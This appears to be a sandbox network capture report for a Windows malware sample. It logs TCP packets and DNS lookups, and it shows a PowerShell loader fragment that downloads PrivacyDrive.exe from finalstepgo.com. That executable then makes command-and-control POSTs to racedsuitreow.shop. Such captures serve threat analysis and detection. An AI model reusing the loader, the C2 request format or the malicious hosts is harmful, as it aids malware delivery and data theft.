                              Sep 26, 2024 17:46:36.069444895 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:36.069757938 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:36.069802999 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:36.069819927 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:36.069828033 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:36.069883108 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:36.069932938 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:36.077157021 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:36.077227116 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:36.078263044 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:36.078337908 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:36.127624035 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:36.127737045 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:36.127796888 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:36.127872944 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:36.127979994 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:36.128051043 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:36.156532049 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:36.156609058 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:36.157457113 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:36.157540083 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:36.157943010 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:36.158005953 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:36.158674002 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:36.158746004 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:36.158811092 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:36.158873081 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:36.158998013 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:36.159077883 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:36.159507990 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:36.159578085 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:36.159964085 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:36.160003901 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:36.160027027 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:36.160032988 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:36.160095930 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:36.160135984 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:36.160135984 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:36.160145044 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:36.160160065 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:36.160195112 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:36.160429001 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:36.160490036 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:36.160728931 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:36.160799980 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:36.168628931 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:36.168704987 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:36.169264078 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:36.169352055 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:36.169359922 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:36.169379950 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:36.169425964 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:36.169477940 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:36.169493914 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:36.169507980 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:36.169513941 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:47.861700058 CEST49744443192.168.2.4172.67.206.221
                              Sep 26, 2024 17:46:47.861784935 CEST44349744172.67.206.221192.168.2.4
                              Sep 26, 2024 17:46:47.862112999 CEST49744443192.168.2.4172.67.206.221
                              Sep 26, 2024 17:46:47.863363028 CEST49744443192.168.2.4172.67.206.221
                              Sep 26, 2024 17:46:47.863416910 CEST44349744172.67.206.221192.168.2.4
                              Sep 26, 2024 17:46:48.357395887 CEST44349744172.67.206.221192.168.2.4
                              Sep 26, 2024 17:46:48.357475042 CEST49744443192.168.2.4172.67.206.221
                              Sep 26, 2024 17:46:48.365916014 CEST49744443192.168.2.4172.67.206.221
                              Sep 26, 2024 17:46:48.365928888 CEST44349744172.67.206.221192.168.2.4
                              Sep 26, 2024 17:46:48.366187096 CEST44349744172.67.206.221192.168.2.4
                              Sep 26, 2024 17:46:48.419166088 CEST49744443192.168.2.4172.67.206.221
                              Sep 26, 2024 17:46:48.443108082 CEST49744443192.168.2.4172.67.206.221
                              Sep 26, 2024 17:46:48.443156004 CEST49744443192.168.2.4172.67.206.221
                              Sep 26, 2024 17:46:48.443223000 CEST44349744172.67.206.221192.168.2.4
                              Sep 26, 2024 17:46:48.562562943 CEST44349744172.67.206.221192.168.2.4
                              Sep 26, 2024 17:46:48.562601089 CEST44349744172.67.206.221192.168.2.4
                              Sep 26, 2024 17:46:48.562624931 CEST44349744172.67.206.221192.168.2.4
                              Sep 26, 2024 17:46:48.562649012 CEST44349744172.67.206.221192.168.2.4
                              Sep 26, 2024 17:46:48.562701941 CEST44349744172.67.206.221192.168.2.4
                              Sep 26, 2024 17:46:48.562794924 CEST49744443192.168.2.4172.67.206.221
                              Sep 26, 2024 17:46:48.562886953 CEST49744443192.168.2.4172.67.206.221
                              Sep 26, 2024 17:46:48.565828085 CEST49744443192.168.2.4172.67.206.221
                              Sep 26, 2024 17:46:48.565890074 CEST44349744172.67.206.221192.168.2.4
                              Sep 26, 2024 17:46:48.565932035 CEST49744443192.168.2.4172.67.206.221
                              Sep 26, 2024 17:46:48.565948009 CEST44349744172.67.206.221192.168.2.4
                              Sep 26, 2024 17:46:48.648124933 CEST49745443192.168.2.4172.67.206.221
                              Sep 26, 2024 17:46:48.648161888 CEST44349745172.67.206.221192.168.2.4
                              Sep 26, 2024 17:46:48.648252964 CEST49745443192.168.2.4172.67.206.221
                              Sep 26, 2024 17:46:48.648562908 CEST49745443192.168.2.4172.67.206.221
                              Sep 26, 2024 17:46:48.648576021 CEST44349745172.67.206.221192.168.2.4
                              Sep 26, 2024 17:46:49.125854015 CEST44349745172.67.206.221192.168.2.4
                              Sep 26, 2024 17:46:49.125919104 CEST49745443192.168.2.4172.67.206.221
                              Sep 26, 2024 17:46:49.127825022 CEST49745443192.168.2.4172.67.206.221
                              Sep 26, 2024 17:46:49.127840042 CEST44349745172.67.206.221192.168.2.4
                              Sep 26, 2024 17:46:49.128156900 CEST44349745172.67.206.221192.168.2.4
                              Sep 26, 2024 17:46:49.129755974 CEST49745443192.168.2.4172.67.206.221
                              Sep 26, 2024 17:46:49.129782915 CEST49745443192.168.2.4172.67.206.221
                              Sep 26, 2024 17:46:49.129837990 CEST44349745172.67.206.221192.168.2.4
                              Sep 26, 2024 17:46:49.598726988 CEST44349745172.67.206.221192.168.2.4
                              Sep 26, 2024 17:46:49.598807096 CEST44349745172.67.206.221192.168.2.4
                              Sep 26, 2024 17:46:49.598896027 CEST49745443192.168.2.4172.67.206.221
                              Sep 26, 2024 17:46:49.599139929 CEST49745443192.168.2.4172.67.206.221
                              Sep 26, 2024 17:46:49.599160910 CEST44349745172.67.206.221192.168.2.4
                              Sep 26, 2024 17:46:49.599175930 CEST49745443192.168.2.4172.67.206.221
                              Sep 26, 2024 17:46:49.599180937 CEST44349745172.67.206.221192.168.2.4
                              Sep 26, 2024 17:46:58.344089031 CEST49748443192.168.2.4172.67.206.221
                              Sep 26, 2024 17:46:58.344156027 CEST44349748172.67.206.221192.168.2.4
                              Sep 26, 2024 17:46:58.344340086 CEST49748443192.168.2.4172.67.206.221
                              Sep 26, 2024 17:46:58.346271992 CEST49748443192.168.2.4172.67.206.221
                              Sep 26, 2024 17:46:58.346302986 CEST44349748172.67.206.221192.168.2.4
                              Sep 26, 2024 17:46:58.843368053 CEST44349748172.67.206.221192.168.2.4
                              Sep 26, 2024 17:46:58.843588114 CEST49748443192.168.2.4172.67.206.221
                              Sep 26, 2024 17:46:58.847440958 CEST49748443192.168.2.4172.67.206.221
                              Sep 26, 2024 17:46:58.847470999 CEST44349748172.67.206.221192.168.2.4
                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                              Sep 26, 2024 17:46:58.848001003 CEST | 443 | 49748 | 172.67.206.221 | 192.168.2.4
                              Sep 26, 2024 17:46:58.934506893 CEST | 49748 | 443 | 192.168.2.4 | 172.67.206.221
                              Sep 26, 2024 17:46:58.934561968 CEST | 49748 | 443 | 192.168.2.4 | 172.67.206.221
                              Sep 26, 2024 17:46:58.934745073 CEST | 443 | 49748 | 172.67.206.221 | 192.168.2.4
                              Sep 26, 2024 17:46:59.100348949 CEST | 443 | 49748 | 172.67.206.221 | 192.168.2.4
                              Sep 26, 2024 17:46:59.100476980 CEST | 443 | 49748 | 172.67.206.221 | 192.168.2.4
                              Sep 26, 2024 17:46:59.100541115 CEST | 49748 | 443 | 192.168.2.4 | 172.67.206.221
                              Sep 26, 2024 17:46:59.100595951 CEST | 443 | 49748 | 172.67.206.221 | 192.168.2.4
                              Sep 26, 2024 17:46:59.102183104 CEST | 443 | 49748 | 172.67.206.221 | 192.168.2.4
                              Sep 26, 2024 17:46:59.102253914 CEST | 49748 | 443 | 192.168.2.4 | 172.67.206.221
                              Sep 26, 2024 17:46:59.102269888 CEST | 443 | 49748 | 172.67.206.221 | 192.168.2.4
                              Sep 26, 2024 17:46:59.102381945 CEST | 443 | 49748 | 172.67.206.221 | 192.168.2.4
                              Sep 26, 2024 17:46:59.102438927 CEST | 49748 | 443 | 192.168.2.4 | 172.67.206.221
                              Sep 26, 2024 17:46:59.102699041 CEST | 49748 | 443 | 192.168.2.4 | 172.67.206.221
                              Sep 26, 2024 17:46:59.102739096 CEST | 443 | 49748 | 172.67.206.221 | 192.168.2.4
                              Sep 26, 2024 17:46:59.102766037 CEST | 49748 | 443 | 192.168.2.4 | 172.67.206.221
                              Sep 26, 2024 17:46:59.102781057 CEST | 443 | 49748 | 172.67.206.221 | 192.168.2.4
                              Sep 26, 2024 17:46:59.286223888 CEST | 49749 | 443 | 192.168.2.4 | 172.67.206.221
                              Sep 26, 2024 17:46:59.286271095 CEST | 443 | 49749 | 172.67.206.221 | 192.168.2.4
                              Sep 26, 2024 17:46:59.286346912 CEST | 49749 | 443 | 192.168.2.4 | 172.67.206.221
                              Sep 26, 2024 17:46:59.286854029 CEST | 49749 | 443 | 192.168.2.4 | 172.67.206.221
                              Sep 26, 2024 17:46:59.286871910 CEST | 443 | 49749 | 172.67.206.221 | 192.168.2.4
                              Sep 26, 2024 17:46:59.804672956 CEST | 443 | 49749 | 172.67.206.221 | 192.168.2.4
                              Sep 26, 2024 17:46:59.804866076 CEST | 49749 | 443 | 192.168.2.4 | 172.67.206.221
                              Sep 26, 2024 17:46:59.808646917 CEST | 49749 | 443 | 192.168.2.4 | 172.67.206.221
                              Sep 26, 2024 17:46:59.808655024 CEST | 443 | 49749 | 172.67.206.221 | 192.168.2.4
                              Sep 26, 2024 17:46:59.809070110 CEST | 443 | 49749 | 172.67.206.221 | 192.168.2.4
                              Sep 26, 2024 17:46:59.812434912 CEST | 49749 | 443 | 192.168.2.4 | 172.67.206.221
                              Sep 26, 2024 17:46:59.812550068 CEST | 49749 | 443 | 192.168.2.4 | 172.67.206.221
                              Sep 26, 2024 17:46:59.812568903 CEST | 443 | 49749 | 172.67.206.221 | 192.168.2.4
                              Sep 26, 2024 17:47:00.280728102 CEST | 443 | 49749 | 172.67.206.221 | 192.168.2.4
                              Sep 26, 2024 17:47:00.280858994 CEST | 443 | 49749 | 172.67.206.221 | 192.168.2.4
                              Sep 26, 2024 17:47:00.280930996 CEST | 49749 | 443 | 192.168.2.4 | 172.67.206.221
                              Sep 26, 2024 17:47:00.281207085 CEST | 49749 | 443 | 192.168.2.4 | 172.67.206.221
                              Sep 26, 2024 17:47:00.281227112 CEST | 443 | 49749 | 172.67.206.221 | 192.168.2.4
                              Sep 26, 2024 17:47:00.281239986 CEST | 49749 | 443 | 192.168.2.4 | 172.67.206.221
                              Sep 26, 2024 17:47:00.281244993 CEST | 443 | 49749 | 172.67.206.221 | 192.168.2.4
                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                              Sep 26, 2024 17:46:25.939004898 CEST | 49709 | 53 | 192.168.2.4 | 1.1.1.1
                              Sep 26, 2024 17:46:26.108680010 CEST | 53 | 49709 | 1.1.1.1 | 192.168.2.4
                              Sep 26, 2024 17:46:47.739042997 CEST | 56742 | 53 | 192.168.2.4 | 1.1.1.1
                              Sep 26, 2024 17:46:47.823362112 CEST | 53 | 56742 | 1.1.1.1 | 192.168.2.4
                              Sep 26, 2024 17:46:47.842585087 CEST | 50546 | 53 | 192.168.2.4 | 1.1.1.1
                              Sep 26, 2024 17:46:47.856554031 CEST | 53 | 50546 | 1.1.1.1 | 192.168.2.4
                              Sep 26, 2024 17:46:58.319453001 CEST | 49660 | 53 | 192.168.2.4 | 1.1.1.1
                              Sep 26, 2024 17:46:58.332429886 CEST | 53 | 49660 | 1.1.1.1 | 192.168.2.4
                              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                              Sep 26, 2024 17:46:25.939004898 CEST | 192.168.2.4 | 1.1.1.1 | 0x47d4 | Standard query (0) | finalstepgo.com | A (IP address) | IN (0x0001) | false
                              Sep 26, 2024 17:46:47.739042997 CEST | 192.168.2.4 | 1.1.1.1 | 0xd7b | Standard query (0) | candleduseiwo.shop | A (IP address) | IN (0x0001) | false
                              Sep 26, 2024 17:46:47.842585087 CEST | 192.168.2.4 | 1.1.1.1 | 0xef4d | Standard query (0) | racedsuitreow.shop | A (IP address) | IN (0x0001) | false
                              Sep 26, 2024 17:46:58.319453001 CEST | 192.168.2.4 | 1.1.1.1 | 0x6dc7 | Standard query (0) | candleduseiwo.shop | A (IP address) | IN (0x0001) | false
                              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                              Sep 26, 2024 17:46:26.108680010 CEST | 1.1.1.1 | 192.168.2.4 | 0x47d4 | No error (0) | finalstepgo.com | | 185.255.122.133 | A (IP address) | IN (0x0001) | false
                              Sep 26, 2024 17:46:47.823362112 CEST | 1.1.1.1 | 192.168.2.4 | 0xd7b | Name error (3) | candleduseiwo.shop | none | none | A (IP address) | IN (0x0001) | false
                              Sep 26, 2024 17:46:47.856554031 CEST | 1.1.1.1 | 192.168.2.4 | 0xef4d | No error (0) | racedsuitreow.shop | | 172.67.206.221 | A (IP address) | IN (0x0001) | false
                              Sep 26, 2024 17:46:47.856554031 CEST | 1.1.1.1 | 192.168.2.4 | 0xef4d | No error (0) | racedsuitreow.shop | | 104.21.37.97 | A (IP address) | IN (0x0001) | false
                              Sep 26, 2024 17:46:58.332429886 CEST | 1.1.1.1 | 192.168.2.4 | 0x6dc7 | Name error (3) | candleduseiwo.shop | none | none | A (IP address) | IN (0x0001) | false
                              • finalstepgo.com
                              • racedsuitreow.shop
                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              0 | 192.168.2.4 | 49730 | 185.255.122.133 | 443 | 7052 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Timestamp | Bytes transferred | Direction | Data
                              2024-09-26 15:46:26 UTC | 175 | OUT | GET /uploads/il2.txt HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                              Host: finalstepgo.com
                              Connection: Keep-Alive
                              2024-09-26 15:46:27 UTC | 206 | IN | HTTP/1.1 200 OK
                              Date: Thu, 26 Sep 2024 15:46:20 GMT
                              Server: Apache
                              Last-Modified: Thu, 26 Sep 2024 14:09:48 GMT
                              Accept-Ranges: bytes
                              Content-Length: 563
                              Connection: close
                              Content-Type: text/plain
                              2024-09-26 15:46:27 UTC | 563 | IN | Data Ascii: $DC9otj0V='https://finalstepgo.com/uploads/il222.zip'; $Oo9IGFrX=$env:APPDATA+'\OIlqJYuE'; $jRAYnWOS=$env:APPDATA+'\yANrdNKT.zip'; $BtdSGfci=$Oo9IGFrX+'\PrivacyDrive.exe'; if (-not (teST-PatH $Oo9IGFrX)) { new-itEM -Path $Oo9IGFrX -ItemType Directory }; S


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              1 | 192.168.2.4 | 49734 | 185.255.122.133 | 443 | 732 | C:\Windows\System32\svchost.exe
                              Timestamp | Bytes transferred | Direction | Data
                              2024-09-26 15:46:33 UTC | 155 | OUT | HEAD /uploads/il222.zip HTTP/1.1
                              Connection: Keep-Alive
                              Accept: */*
                              Accept-Encoding: identity
                              User-Agent: Microsoft BITS/7.8
                              Host: finalstepgo.com
                              2024-09-26 15:46:33 UTC | 215 | IN | HTTP/1.1 200 OK
                              Date: Thu, 26 Sep 2024 15:46:26 GMT
                              Server: Apache
                              Last-Modified: Thu, 26 Sep 2024 14:09:59 GMT
                              Accept-Ranges: bytes
                              Content-Length: 1527814
                              Connection: close
                              Content-Type: application/zip


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              2 | 192.168.2.4 | 49735 | 185.255.122.133 | 443 | 732 | C:\Windows\System32\svchost.exe
                              Timestamp | Bytes transferred | Direction | Data
                              2024-09-26 15:46:34 UTC | 206 | OUT | GET /uploads/il222.zip HTTP/1.1
                              Connection: Keep-Alive
                              Accept: */*
                              Accept-Encoding: identity
                              If-Unmodified-Since: Thu, 26 Sep 2024 14:09:59 GMT
                              User-Agent: Microsoft BITS/7.8
                              Host: finalstepgo.com
                              2024-09-26 15:46:34 UTC | 215 | IN | HTTP/1.1 200 OK
                              Date: Thu, 26 Sep 2024 15:46:27 GMT
                              Server: Apache
                              Last-Modified: Thu, 26 Sep 2024 14:09:59 GMT
                              Accept-Ranges: bytes
                              Content-Length: 1527814
                              Connection: close
                              Content-Type: application/zip
                              2024-09-26 15:46:34 UTC | 7977 | IN | Data Ascii: PKc5:YN+G)`O+PrivacyDrive.exe}\TEeWvQPJT,044A]DYn%bJiaSYiJffij>V4EC;g>Os9s3g&M\03_,u[,nM/=##{f["=m})"FMxqm>P(


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              3 | 192.168.2.4 | 49744 | 172.67.206.221 | 443 | 2504 | C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe
                              Timestamp | Bytes transferred | Direction | Data
                              2024-09-26 15:46:48 UTC | 265 | OUT | POST /api HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                              Content-Length: 8
                              Host: racedsuitreow.shop
                              2024-09-26 15:46:48 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                              Data Ascii: act=life
                              2024-09-26 15:46:48 UTC | 551 | IN | HTTP/1.1 200 OK
                              Date: Thu, 26 Sep 2024 15:46:48 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Re0xI7BSYN7MsD6%2BVlc029%2FUMvMlYltWU%2FyjK6QASRKj8sCmeKxIxA9P6U4WNxyI5bjxJTKkTcNXEgGZdeLItaWwL7dSuV6aK37edUB9FDwAEusKIgAcDMojZ2YsUTPdCThPdys%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8c94638d2bf142bf-EWR
                              2024-09-26 15:46:48 UTC | 818 | IN | Data Ascii: 112d<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                              2024-09-26 15:46:48 UTC | 1369 | IN | Data Ascii: cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cook
                              2024-09-26 15:46:48 UTC | 1369 | IN | Data Ascii: <input type="hidden" name="atok" value="2VbLUtXoIqa2pl0uSvd6B6CRPFFCp4FfUF1UfiX3kg8-1727365608-0.0.1.1-/api"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" st
                              2024-09-26 15:46:48 UTC | 849 | IN | Data Ascii: m:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a
                              2024-09-26 15:46:48 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              4 | 192.168.2.4 | 49745 | 172.67.206.221 | 443 | 2504 | C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe
                              Timestamp | Bytes transferred | Direction | Data
                              2024-09-26 15:46:49 UTC | 355 | OUT | POST /api HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Cookie: __cf_mw_byp=2VbLUtXoIqa2pl0uSvd6B6CRPFFCp4FfUF1UfiX3kg8-1727365608-0.0.1.1-/api
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                              Content-Length: 49
                              Host: racedsuitreow.shop
                              2024-09-26 15:46:49 UTC | 49 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 4a 45 63 61 47 2d 2d 72 75 69 31 32 32 32 26 6a 3d
                              Data Ascii: act=recive_message&ver=4.0&lid=yJEcaG--rui1222&j=
                              2024-09-26 15:46:49 UTC | 802 | IN | HTTP/1.1 200 OK
                              Date: Thu, 26 Sep 2024 15:46:49 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Set-Cookie: PHPSESSID=9qf2pccqovrdasfka88o2bem2c; expires=Mon, 20 Jan 2025 09:33:28 GMT; Max-Age=9999999; path=/
                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                              Cache-Control: no-store, no-cache, must-revalidate
                              Pragma: no-cache
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SIztV5Bz3t9VVrStP02Wkt7ZZy%2F5utC31aiKKYKK3%2FI1QGRPX5KZgtgieRIXCjiRh1ZNbO26po3Xh9SeaYOfw5unYYRSZsUCg4vYRQUZhDH%2F5HO2BWrDseUPNs4PaphLv9XBSkc%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8c9463919a0a0cb4-EWR
                              alt-svc: h3=":443"; ma=86400
                              2024-09-26 15:46:49 UTC | 15 | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                              Data Ascii: aerror #D12
                              2024-09-26 15:46:49 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              5 | 192.168.2.4 | 49748 | 172.67.206.221 | 443 | 764 | C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe
                              Timestamp | Bytes transferred | Direction | Data
                              2024-09-26 15:46:58 UTC | 265 | OUT | POST /api HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                              Content-Length: 8
                              Host: racedsuitreow.shop
                              2024-09-26 15:46:58 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                              Data Ascii: act=life
                              2024-09-26 15:46:59 UTC | 551 | IN | HTTP/1.1 200 OK
                              Date: Thu, 26 Sep 2024 15:46:59 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Oqu3udVx3jjsSUlPBNEzPJdE0n7XkXmjfe5kAP1zS20bicIuTLoxSY7XuB8z8rcG6905nmS09%2FghKBERNMA87nKh2xOSRylqY60z11EH%2Fp0dt3xDT8FOIQmMEX89P%2B3ZJDrfwlg%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8c9463cedd8c8c17-EWR
                              2024-09-26 15:46:59 UTC818INData Raw: 31 31 32 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                              Data Ascii: 112d<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                              2024-09-26 15:46:59 UTC1369INData Raw: 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b
                              Data Ascii: cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cook
